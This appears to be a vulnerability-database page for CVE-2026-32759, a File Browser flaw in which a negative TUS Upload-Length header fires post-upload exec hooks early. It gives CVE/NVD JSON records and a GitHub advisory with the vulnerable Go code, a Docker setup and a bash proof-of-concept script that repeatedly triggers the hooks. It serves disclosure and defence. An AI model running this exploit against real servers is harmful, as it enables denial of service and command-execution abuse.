Vulnerability-Lookup

CVE-2026-32759 (GCVE-0-2026-32759)

Vulnerability from cvelistv5 – Published: 2026-03-19 23:31 – Updated: 2026-03-20 16:48

Title

File Browser TUS Negative Upload-Length Fires Post-Upload Hooks Prematurely

Summary

File Browser is a file managing interface for uploading, deleting, previewing, renaming, and editing files within a specified directory. In versions 2.61.2 and below, the TUS resumable upload handler parses the Upload-Length header as a signed 64-bit integer without validating that the value is non-negative, allowing an authenticated user to supply a negative value that instantly satisfies the upload completion condition upon the first PATCH request. This causes the server to fire after_upload exec hooks with empty or partial files, enabling an attacker to repeatedly trigger any configured hook with arbitrary filenames and zero bytes written. The impact ranges from DoS through expensive processing hooks, to command injection amplification when combined with malicious filenames, to abuse of upload-driven workflows like S3 ingestion or database inserts. Even without exec hooks enabled, the negative Upload-Length creates inconsistent cache entries where files are marked complete but contain no data. All deployments using the TUS upload endpoint (/api/tus) are affected, with the enableExec flag escalating the impact from cache inconsistency to remote command execution. At the time of publication, no patch or mitigation was available to address this issue.

Severity ?

5.3 (Medium)


                        
                          CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:L/SC:N/SI:L/SA:L

CWE

CWE-190 - Integer Overflow or Wraparound

Assigner

GitHub_M

References

URL

Tags

	https://github.com/filebrowser/filebrowser/securi…	x_refsource_CONFIRM
	https://github.com/filebrowser/filebrowser/issues/5199	x_refsource_MISC

Impacted products

	Vendor	Product	Version
	filebrowser	filebrowser	Affected: <= 2.61.2

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2026-32759",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2026-03-20T16:47:43.694106Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2026-03-20T16:48:15.600Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "filebrowser",
          "vendor": "filebrowser",
          "versions": [
            {
              "status": "affected",
              "version": "\u003c= 2.61.2"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "File Browser is a file managing interface for uploading, deleting, previewing, renaming, and editing files within a specified directory. In versions 2.61.2 and below, the TUS resumable upload handler parses the Upload-Length header as a signed 64-bit integer without validating that the value is non-negative, allowing an authenticated user to supply a negative value that instantly satisfies the upload completion condition upon the first PATCH request. This causes the server to fire after_upload exec hooks with empty or partial files, enabling an attacker to repeatedly trigger any configured hook with arbitrary filenames and zero bytes written. The impact ranges from DoS through expensive processing hooks, to command injection amplification when combined with malicious filenames, to abuse of upload-driven workflows like S3 ingestion or database inserts. Even without exec hooks enabled, the negative Upload-Length creates inconsistent cache entries where files are marked complete but contain no data. All deployments using the TUS upload endpoint (/api/tus) are affected, with the enableExec flag escalating the impact from cache inconsistency to remote command execution. At the time of publication, no patch or mitigation was available to address this issue."
        }
      ],
      "metrics": [
        {
          "cvssV4_0": {
            "attackComplexity": "LOW",
            "attackRequirements": "NONE",
            "attackVector": "NETWORK",
            "baseScore": 5.3,
            "baseSeverity": "MEDIUM",
            "privilegesRequired": "LOW",
            "subAvailabilityImpact": "LOW",
            "subConfidentialityImpact": "NONE",
            "subIntegrityImpact": "LOW",
            "userInteraction": "NONE",
            "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:L/SC:N/SI:L/SA:L",
            "version": "4.0",
            "vulnAvailabilityImpact": "LOW",
            "vulnConfidentialityImpact": "NONE",
            "vulnIntegrityImpact": "LOW"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-190",
              "description": "CWE-190: Integer Overflow or Wraparound",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-03-19T23:31:51.340Z",
        "orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
        "shortName": "GitHub_M"
      },
      "references": [
        {
          "name": "https://github.com/filebrowser/filebrowser/security/advisories/GHSA-ffx7-75gc-jg7c",
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://github.com/filebrowser/filebrowser/security/advisories/GHSA-ffx7-75gc-jg7c"
        },
        {
          "name": "https://github.com/filebrowser/filebrowser/issues/5199",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/filebrowser/filebrowser/issues/5199"
        }
      ],
      "source": {
        "advisory": "GHSA-ffx7-75gc-jg7c",
        "discovery": "UNKNOWN"
      },
      "title": "File Browser TUS Negative Upload-Length Fires Post-Upload Hooks Prematurely"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
    "assignerShortName": "GitHub_M",
    "cveId": "CVE-2026-32759",
    "datePublished": "2026-03-19T23:31:51.340Z",
    "dateReserved": "2026-03-13T18:53:03.532Z",
    "dateUpdated": "2026-03-20T16:48:15.600Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2",
  "vulnerability-lookup:meta": {
    "epss": {
      "cve": "CVE-2026-32759",
      "date": "2026-04-16",
      "epss": "0.00184",
      "percentile": "0.4016"
    },
    "nvd": "{\"cve\":{\"id\":\"CVE-2026-32759\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2026-03-20T00:16:17.270\",\"lastModified\":\"2026-03-23T16:54:09.273\",\"vulnStatus\":\"Analyzed\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"File Browser is a file managing interface for uploading, deleting, previewing, renaming, and editing files within a specified directory. In versions 2.61.2 and below, the TUS resumable upload handler parses the Upload-Length header as a signed 64-bit integer without validating that the value is non-negative, allowing an authenticated user to supply a negative value that instantly satisfies the upload completion condition upon the first PATCH request. This causes the server to fire after_upload exec hooks with empty or partial files, enabling an attacker to repeatedly trigger any configured hook with arbitrary filenames and zero bytes written. The impact ranges from DoS through expensive processing hooks, to command injection amplification when combined with malicious filenames, to abuse of upload-driven workflows like S3 ingestion or database inserts. Even without exec hooks enabled, the negative Upload-Length creates inconsistent cache entries where files are marked complete but contain no data. All deployments using the TUS upload endpoint (/api/tus) are affected, with the enableExec flag escalating the impact from cache inconsistency to remote command execution. At the time of publication, no patch or mitigation was available to address this issue.\"},{\"lang\":\"es\",\"value\":\"Navegador de Archivos es una interfaz de gesti\u00f3n de archivos para subir, eliminar, previsualizar, renombrar y editar archivos dentro de un directorio especificado. En las versiones 2.61.2 e inferiores, el gestor de carga reanudable TUS analiza el encabezado Upload-Length como un entero con signo de 64 bits sin validar que el valor no sea negativo, permitiendo a un usuario autenticado proporcionar un valor negativo que satisface instant\u00e1neamente la condici\u00f3n de finalizaci\u00f3n de la carga tras la primera solicitud PATCH. Esto hace que el servidor dispare ganchos de ejecuci\u00f3n \u0027after_upload\u0027 con archivos vac\u00edos o parciales, permitiendo a un atacante activar repetidamente cualquier gancho configurado con nombres de archivo arbitrarios y cero bytes escritos. El impacto abarca desde DoS a trav\u00e9s de ganchos de procesamiento costosos, hasta la amplificaci\u00f3n de la inyecci\u00f3n de comandos cuando se combina con nombres de archivo maliciosos, hasta el abuso de flujos de trabajo impulsados por la carga como la ingesta de S3 o las inserciones en la base de datos. Incluso sin los ganchos de ejecuci\u00f3n habilitados, el Upload-Length negativo crea entradas de cach\u00e9 inconsistentes donde los archivos se marcan como completos pero no contienen datos. Todas las implementaciones que utilizan el punto final de carga TUS (/api/tus) se ven afectadas, con la bandera \u0027enableExec\u0027 escalando el impacto desde la inconsistencia de la cach\u00e9 hasta la ejecuci\u00f3n remota de comandos. En el momento de la publicaci\u00f3n, no hab\u00eda ning\u00fan parche o mitigaci\u00f3n disponible para abordar este problema.\"}],\"metrics\":{\"cvssMetricV40\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"4.0\",\"vectorString\":\"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:L/SC:N/SI:L/SA:L/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X\",\"baseScore\":5.3,\"baseSeverity\":\"MEDIUM\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"attackRequirements\":\"NONE\",\"privilegesRequired\":\"LOW\",\"userInteraction\":\"NONE\",\"vulnConfidentialityImpact\":\"NONE\",\"vulnIntegrityImpact\":\"LOW\",\"vulnAvailabilityImpact\":\"LOW\",\"subConfidentialityImpact\":\"NONE\",\"subIntegrityImpact\":\"LOW\",\"subAvailabilityImpact\":\"LOW\",\"exploitMaturity\":\"NOT_DEFINED\",\"confidentialityRequirement\":\"NOT_DEFINED\",\"integrityRequirement\":\"NOT_DEFINED\",\"availabilityRequirement\":\"NOT_DEFINED\",\"modifiedAttackVector\":\"NOT_DEFINED\",\"modifiedAttackComplexity\":\"NOT_DEFINED\",\"modifiedAttackRequirements\":\"NOT_DEFINED\",\"modifiedPrivilegesRequired\":\"NOT_DEFINED\",\"modifiedUserInteraction\":\"NOT_DEFINED\",\"modifiedVulnConfidentialityImpact\":\"NOT_DEFINED\",\"modifiedVulnIntegrityImpact\":\"NOT_DEFINED\",\"modifiedVulnAvailabilityImpact\":\"NOT_DEFINED\",\"modifiedSubConfidentialityImpact\":\"NOT_DEFINED\",\"modifiedSubIntegrityImpact\":\"NOT_DEFINED\",\"modifiedSubAvailabilityImpact\":\"NOT_DEFINED\",\"Safety\":\"NOT_DEFINED\",\"Automatable\":\"NOT_DEFINED\",\"Recovery\":\"NOT_DEFINED\",\"valueDensity\":\"NOT_DEFINED\",\"vulnerabilityResponseEffort\":\"NOT_DEFINED\",\"providerUrgency\":\"NOT_DEFINED\"}}],\"cvssMetricV31\":[{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H\",\"baseScore\":8.1,\"baseSeverity\":\"HIGH\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"LOW\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"NONE\",\"integrityImpact\":\"HIGH\",\"availabilityImpact\":\"HIGH\"},\"exploitabilityScore\":2.8,\"impactScore\":5.2}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Primary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-190\"}]}],\"configurations\":[{\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:filebrowser:filebrowser:*:*:*:*:*:*:*:*\",\"versionEndIncluding\":\"2.61.2\",\"matchCriteriaId\":\"A64EB522-E0AD-4202-A2F6-E35934B210DD\"}]}]}],\"references\":[{\"url\":\"https://github.com/filebrowser/filebrowser/issues/5199\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Issue Tracking\"]},{\"url\":\"https://github.com/filebrowser/filebrowser/security/advisories/GHSA-ffx7-75gc-jg7c\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Exploit\",\"Vendor Advisory\"]}]}}",
    "vulnrichment": {
      "containers": "{\"adp\": [{\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2026-32759\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"none\"}, {\"Automatable\": \"no\"}, {\"Technical Impact\": \"partial\"}], \"version\": \"2.0.3\", \"timestamp\": \"2026-03-20T16:47:43.694106Z\"}}}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2026-03-20T16:48:00.247Z\"}}], \"cna\": {\"title\": \"File Browser TUS Negative Upload-Length Fires Post-Upload Hooks Prematurely\", \"source\": {\"advisory\": \"GHSA-ffx7-75gc-jg7c\", \"discovery\": \"UNKNOWN\"}, \"metrics\": [{\"cvssV4_0\": {\"version\": \"4.0\", \"baseScore\": 5.3, \"attackVector\": \"NETWORK\", \"baseSeverity\": \"MEDIUM\", \"vectorString\": \"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:L/SC:N/SI:L/SA:L\", \"userInteraction\": \"NONE\", \"attackComplexity\": \"LOW\", \"attackRequirements\": \"NONE\", \"privilegesRequired\": \"LOW\", \"subIntegrityImpact\": \"LOW\", \"vulnIntegrityImpact\": \"LOW\", \"subAvailabilityImpact\": \"LOW\", \"vulnAvailabilityImpact\": \"LOW\", \"subConfidentialityImpact\": \"NONE\", \"vulnConfidentialityImpact\": \"NONE\"}}], \"affected\": [{\"vendor\": \"filebrowser\", \"product\": \"filebrowser\", \"versions\": [{\"status\": \"affected\", \"version\": \"\u003c= 2.61.2\"}]}], \"references\": [{\"url\": \"https://github.com/filebrowser/filebrowser/security/advisories/GHSA-ffx7-75gc-jg7c\", \"name\": \"https://github.com/filebrowser/filebrowser/security/advisories/GHSA-ffx7-75gc-jg7c\", \"tags\": [\"x_refsource_CONFIRM\"]}, {\"url\": \"https://github.com/filebrowser/filebrowser/issues/5199\", \"name\": \"https://github.com/filebrowser/filebrowser/issues/5199\", \"tags\": [\"x_refsource_MISC\"]}], \"descriptions\": [{\"lang\": \"en\", \"value\": \"File Browser is a file managing interface for uploading, deleting, previewing, renaming, and editing files within a specified directory. In versions 2.61.2 and below, the TUS resumable upload handler parses the Upload-Length header as a signed 64-bit integer without validating that the value is non-negative, allowing an authenticated user to supply a negative value that instantly satisfies the upload completion condition upon the first PATCH request. This causes the server to fire after_upload exec hooks with empty or partial files, enabling an attacker to repeatedly trigger any configured hook with arbitrary filenames and zero bytes written. The impact ranges from DoS through expensive processing hooks, to command injection amplification when combined with malicious filenames, to abuse of upload-driven workflows like S3 ingestion or database inserts. Even without exec hooks enabled, the negative Upload-Length creates inconsistent cache entries where files are marked complete but contain no data. All deployments using the TUS upload endpoint (/api/tus) are affected, with the enableExec flag escalating the impact from cache inconsistency to remote command execution. At the time of publication, no patch or mitigation was available to address this issue.\"}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-190\", \"description\": \"CWE-190: Integer Overflow or Wraparound\"}]}], \"providerMetadata\": {\"orgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"shortName\": \"GitHub_M\", \"dateUpdated\": \"2026-03-19T23:31:51.340Z\"}}}",
      "cveMetadata": "{\"cveId\": \"CVE-2026-32759\", \"state\": \"PUBLISHED\", \"dateUpdated\": \"2026-03-20T16:48:15.600Z\", \"dateReserved\": \"2026-03-13T18:53:03.532Z\", \"assignerOrgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"datePublished\": \"2026-03-19T23:31:51.340Z\", \"assignerShortName\": \"GitHub_M\"}",
      "dataType": "CVE_RECORD",
      "dataVersion": "5.2"
    }
  }
}

FKIE_CVE-2026-32759

Vulnerability from fkie_nvd - Published: 2026-03-20 00:16 - Updated: 2026-03-23 16:54

Severity ?

8.1 (High) - CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H

Summary

References

	URL	Tags
	security-advisories@github.com	https://github.com/filebrowser/filebrowser/issues/5199	Issue Tracking
	security-advisories@github.com	https://github.com/filebrowser/filebrowser/security/advisories/GHSA-ffx7-75gc-jg7c	Exploit, Vendor Advisory

Impacted products

	Vendor	Product	Version
	filebrowser	filebrowser	*

JSON

To clipboard

{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:filebrowser:filebrowser:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "A64EB522-E0AD-4202-A2F6-E35934B210DD",
              "versionEndIncluding": "2.61.2",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "File Browser is a file managing interface for uploading, deleting, previewing, renaming, and editing files within a specified directory. In versions 2.61.2 and below, the TUS resumable upload handler parses the Upload-Length header as a signed 64-bit integer without validating that the value is non-negative, allowing an authenticated user to supply a negative value that instantly satisfies the upload completion condition upon the first PATCH request. This causes the server to fire after_upload exec hooks with empty or partial files, enabling an attacker to repeatedly trigger any configured hook with arbitrary filenames and zero bytes written. The impact ranges from DoS through expensive processing hooks, to command injection amplification when combined with malicious filenames, to abuse of upload-driven workflows like S3 ingestion or database inserts. Even without exec hooks enabled, the negative Upload-Length creates inconsistent cache entries where files are marked complete but contain no data. All deployments using the TUS upload endpoint (/api/tus) are affected, with the enableExec flag escalating the impact from cache inconsistency to remote command execution. At the time of publication, no patch or mitigation was available to address this issue."
    },
    {
      "lang": "es",
      "value": "Navegador de Archivos es una interfaz de gesti\u00f3n de archivos para subir, eliminar, previsualizar, renombrar y editar archivos dentro de un directorio especificado. En las versiones 2.61.2 e inferiores, el gestor de carga reanudable TUS analiza el encabezado Upload-Length como un entero con signo de 64 bits sin validar que el valor no sea negativo, permitiendo a un usuario autenticado proporcionar un valor negativo que satisface instant\u00e1neamente la condici\u00f3n de finalizaci\u00f3n de la carga tras la primera solicitud PATCH. Esto hace que el servidor dispare ganchos de ejecuci\u00f3n \u0027after_upload\u0027 con archivos vac\u00edos o parciales, permitiendo a un atacante activar repetidamente cualquier gancho configurado con nombres de archivo arbitrarios y cero bytes escritos. El impacto abarca desde DoS a trav\u00e9s de ganchos de procesamiento costosos, hasta la amplificaci\u00f3n de la inyecci\u00f3n de comandos cuando se combina con nombres de archivo maliciosos, hasta el abuso de flujos de trabajo impulsados por la carga como la ingesta de S3 o las inserciones en la base de datos. Incluso sin los ganchos de ejecuci\u00f3n habilitados, el Upload-Length negativo crea entradas de cach\u00e9 inconsistentes donde los archivos se marcan como completos pero no contienen datos. Todas las implementaciones que utilizan el punto final de carga TUS (/api/tus) se ven afectadas, con la bandera \u0027enableExec\u0027 escalando el impacto desde la inconsistencia de la cach\u00e9 hasta la ejecuci\u00f3n remota de comandos. En el momento de la publicaci\u00f3n, no hab\u00eda ning\u00fan parche o mitigaci\u00f3n disponible para abordar este problema."
    }
  ],
  "id": "CVE-2026-32759",
  "lastModified": "2026-03-23T16:54:09.273",
  "metrics": {
    "cvssMetricV31": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "HIGH",
          "baseScore": 8.1,
          "baseSeverity": "HIGH",
          "confidentialityImpact": "NONE",
          "integrityImpact": "HIGH",
          "privilegesRequired": "LOW",
          "scope": "UNCHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H",
          "version": "3.1"
        },
        "exploitabilityScore": 2.8,
        "impactScore": 5.2,
        "source": "nvd@nist.gov",
        "type": "Primary"
      }
    ],
    "cvssMetricV40": [
      {
        "cvssData": {
          "Automatable": "NOT_DEFINED",
          "Recovery": "NOT_DEFINED",
          "Safety": "NOT_DEFINED",
          "attackComplexity": "LOW",
          "attackRequirements": "NONE",
          "attackVector": "NETWORK",
          "availabilityRequirement": "NOT_DEFINED",
          "baseScore": 5.3,
          "baseSeverity": "MEDIUM",
          "confidentialityRequirement": "NOT_DEFINED",
          "exploitMaturity": "NOT_DEFINED",
          "integrityRequirement": "NOT_DEFINED",
          "modifiedAttackComplexity": "NOT_DEFINED",
          "modifiedAttackRequirements": "NOT_DEFINED",
          "modifiedAttackVector": "NOT_DEFINED",
          "modifiedPrivilegesRequired": "NOT_DEFINED",
          "modifiedSubAvailabilityImpact": "NOT_DEFINED",
          "modifiedSubConfidentialityImpact": "NOT_DEFINED",
          "modifiedSubIntegrityImpact": "NOT_DEFINED",
          "modifiedUserInteraction": "NOT_DEFINED",
          "modifiedVulnAvailabilityImpact": "NOT_DEFINED",
          "modifiedVulnConfidentialityImpact": "NOT_DEFINED",
          "modifiedVulnIntegrityImpact": "NOT_DEFINED",
          "privilegesRequired": "LOW",
          "providerUrgency": "NOT_DEFINED",
          "subAvailabilityImpact": "LOW",
          "subConfidentialityImpact": "NONE",
          "subIntegrityImpact": "LOW",
          "userInteraction": "NONE",
          "valueDensity": "NOT_DEFINED",
          "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:L/SC:N/SI:L/SA:L/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
          "version": "4.0",
          "vulnAvailabilityImpact": "LOW",
          "vulnConfidentialityImpact": "NONE",
          "vulnIntegrityImpact": "LOW",
          "vulnerabilityResponseEffort": "NOT_DEFINED"
        },
        "source": "security-advisories@github.com",
        "type": "Secondary"
      }
    ]
  },
  "published": "2026-03-20T00:16:17.270",
  "references": [
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Issue Tracking"
      ],
      "url": "https://github.com/filebrowser/filebrowser/issues/5199"
    },
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Exploit",
        "Vendor Advisory"
      ],
      "url": "https://github.com/filebrowser/filebrowser/security/advisories/GHSA-ffx7-75gc-jg7c"
    }
  ],
  "sourceIdentifier": "security-advisories@github.com",
  "vulnStatus": "Analyzed",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-190"
        }
      ],
      "source": "security-advisories@github.com",
      "type": "Primary"
    }
  ]
}

GHSA-FFX7-75GC-JG7C

Vulnerability from github – Published: 2026-03-16 20:43 – Updated: 2026-03-30 13:59

Summary

File Browser TUS Negative Upload-Length Fires Post-Upload Hooks Prematurely

Details

Summary

The TUS resumable upload handler parses the Upload-Length header as a signed 64-bit integer without validating that the value is non-negative. When a negative value is supplied (e.g. -1), the first PATCH request immediately satisfies the completion condition (newOffset >= uploadLength → 0 >= -1), causing the server to fire after_upload exec hooks with a partial or empty file. An authenticated user with upload permission can trigger any configured after_upload hook an unlimited number of times for any filename they choose, regardless of whether the file was actually uploaded - with zero bytes written.

Details

Affected file: http/tus_handlers.go

Vulnerable code - POST (register upload):

func getUploadLength(r *http.Request) (int64, error) {
    uploadOffset, err := strconv.ParseInt(r.Header.Get("Upload-Length"), 10, 64)
    // ← int64: accepts -1, -9223372036854775808, etc.
    if err != nil {
        return 0, fmt.Errorf("invalid upload length: %w", err)
    }
    return uploadOffset, nil
}

// In tusPostHandler:
uploadLength, err := getUploadLength(r)   // uploadLength = -1 (attacker-supplied)
cache.Register(file.RealPath(), uploadLength)  // stores -1 as expected size

Vulnerable code - PATCH (write chunk):

// In tusPatchHandler:
newOffset := uploadOffset + bytesWritten  // 0 + 0 = 0 (empty body)
if newOffset >= uploadLength {            // 0 >= -1 → TRUE immediately!
    cache.Complete(file.RealPath())
    _ = d.RunHook(func() error { return nil }, "upload", r.URL.Path, "", d.user)
    // ← after_upload hook fires with empty or partial file
}

The completion check uses signed comparison. Any negative uploadLength is always less than newOffset (which starts at 0), so the hook fires on the very first PATCH regardless of how many bytes were sent.

Consequence: An attacker with upload permission can: 1. Initiate a TUS upload for any filename with Upload-Length: -1 2. Send a PATCH with an empty body (Upload-Offset: 0) 3. after_upload hook fires immediately with a 0-byte (or partial) file 4. Repeat indefinitely - each POST+PATCH cycle re-fires the hook

If exec hooks are enabled and perform important operations on uploaded files (virus scanning, image processing, notifications, data pipeline ingestion), they will be triggered with attacker-controlled filenames and empty file contents.

Demo Server Setup

docker run -d --name fb-tus \
  -p 8080:80 \
  -v /tmp/fb-tus:/srv \
  -e FB_EXECER=true \
  filebrowser/filebrowser:v2.31.2

ADMIN_TOKEN=$(curl -s -X POST http://localhost:8080/api/login \
  -H 'Content-Type: application/json' \
  -d '{"username":"admin","password":"admin"}')

# Configure a visible after_upload hook
curl -s -X PUT http://localhost:8080/api/settings \
  -H "X-Auth: $ADMIN_TOKEN" \
  -H 'Content-Type: application/json' \
  -d '{
    "commands": {
      "after_upload": ["bash -c \"echo HOOK_FIRED: $FILE $(date) >> /tmp/hook_log.txt\""]
    }
  }'

PoC Exploit

#!/bin/bash
# poc_tus_negative_length.sh

TARGET="http://localhost:8080"

# Login as any user with upload permission
TOKEN=$(curl -s -X POST "$TARGET/api/login" \
  -H "Content-Type: application/json" \
  -d '{"username":"attacker","password":"Attack3r!pass"}')

echo "[*] Token: ${TOKEN:0:40}..."

FILENAME="/trigger_test_$(date +%s).txt"

echo "[*] Step 1: POST TUS upload with Upload-Length: -1"
curl -s -X POST "$TARGET/api/tus$FILENAME" \
  -H "X-Auth: $TOKEN" \
  -H "Upload-Length: -1" \
  -H "Content-Length: 0" \
  -v 2>&1 | grep -E "HTTP|Location"

echo ""
echo "[*] Step 2: PATCH with empty body (uploadOffset=0 >= uploadLength=-1 → hook fires)"
curl -s -X PATCH "$TARGET/api/tus$FILENAME" \
  -H "X-Auth: $TOKEN" \
  -H "Upload-Offset: 0" \
  -H "Content-Type: application/offset+octet-stream" \
  -H "Content-Length: 0" \
  -v 2>&1 | grep -E "HTTP|Upload"

echo ""
echo "[*] Checking hook log on server (/tmp/hook_log.txt)..."
echo "[*] If hook fired, you will see entries like:"
echo "    HOOK_FIRED: /srv/trigger_test_XXXX.txt <timestamp>"

echo ""
echo "[*] Repeating 5 times to demonstrate unlimited hook triggering..."
for i in $(seq 1 5); do
  FNAME="/spam_hook_$i.txt"
  curl -s -X POST "$TARGET/api/tus$FNAME" \
    -H "X-Auth: $TOKEN" \
    -H "Upload-Length: -1" \
    -H "Content-Length: 0" > /dev/null

  curl -s -X PATCH "$TARGET/api/tus$FNAME" \
    -H "X-Auth: $TOKEN" \
    -H "Upload-Offset: 0" \
    -H "Content-Type: application/offset+octet-stream" \
    -H "Content-Length: 0" > /dev/null

  echo "  Hook trigger $i sent"
done
echo "[*] Done - 5 hooks fired with 0 bytes uploaded."

Impact

Exec Hook Abuse (when enableExec = true): An attacker can trigger any after_upload exec hook an unlimited number of times with attacker-controlled filenames and empty file contents. Depending on the hook's purpose, this enables:

Denial of Service: Triggering expensive processing hooks (virus scanning, transcoding, ML inference) with zero cost on the attacker's side.
Command Injection amplification: Combined with the hook injection vulnerability (malicious filename + shell-wrapped hook), each trigger becomes a separate RCE.
Business logic abuse: Triggering upload-driven workflows (S3 ingestion, database inserts, notifications) with empty payloads or arbitrary filenames.

Hook-free impact: Even without exec hooks, a negative Upload-Length creates an inconsistent cache entry. The file is marked "complete" in the upload cache immediately, but the underlying file may be 0 bytes. Any subsequent read expecting a complete file will receive an empty file.

Who is affected: All deployments using the TUS upload endpoint (/api/tus). The enableExec flag amplifies the impact from cache inconsistency to remote command execution.

Resolution

This vulnerability has not been addressed, and has been added to the issue tracking all security vulnerabilities regarding the command execution (https://github.com/filebrowser/filebrowser/issues/5199). Command execution is disabled by default for all installations and users are warned if they enable it. This feature is not to be used in untrusted environments and we recommend to not use it.

Severity ?

5.3 (Medium)


                  
                    CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:L/SC:N/SI:L/SA:L

Show details on source website

JSON

To clipboard

{
  "affected": [
    {
      "package": {
        "ecosystem": "Go",
        "name": "github.com/filebrowser/filebrowser/v2"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "last_affected": "2.61.1"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-32759"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-190"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-03-16T20:43:29Z",
    "nvd_published_at": "2026-03-20T00:16:17Z",
    "severity": "MODERATE"
  },
  "details": "## Summary\nThe TUS resumable upload handler parses the `Upload-Length` header as a signed 64-bit integer without validating that the value is non-negative. When a negative value is supplied (e.g. `-1`), the first PATCH request immediately satisfies the completion condition (`newOffset \u003e= uploadLength` \u2192 `0 \u003e= -1`), causing the server to fire `after_upload` exec hooks with a partial or empty file. An authenticated user with upload permission can trigger any configured `after_upload` hook an unlimited number of times for any filename they choose, regardless of whether the file was actually uploaded - with zero bytes written.\n\n## Details\n\n**Affected file:** `http/tus_handlers.go`\n\n**Vulnerable code - POST (register upload):**\n```go\nfunc getUploadLength(r *http.Request) (int64, error) {\n    uploadOffset, err := strconv.ParseInt(r.Header.Get(\"Upload-Length\"), 10, 64)\n    // \u2190 int64: accepts -1, -9223372036854775808, etc.\n    if err != nil {\n        return 0, fmt.Errorf(\"invalid upload length: %w\", err)\n    }\n    return uploadOffset, nil\n}\n\n// In tusPostHandler:\nuploadLength, err := getUploadLength(r)   // uploadLength = -1 (attacker-supplied)\ncache.Register(file.RealPath(), uploadLength)  // stores -1 as expected size\n```\n\n**Vulnerable code - PATCH (write chunk):**\n```go\n// In tusPatchHandler:\nnewOffset := uploadOffset + bytesWritten  // 0 + 0 = 0 (empty body)\nif newOffset \u003e= uploadLength {            // 0 \u003e= -1 \u2192 TRUE immediately!\n    cache.Complete(file.RealPath())\n    _ = d.RunHook(func() error { return nil }, \"upload\", r.URL.Path, 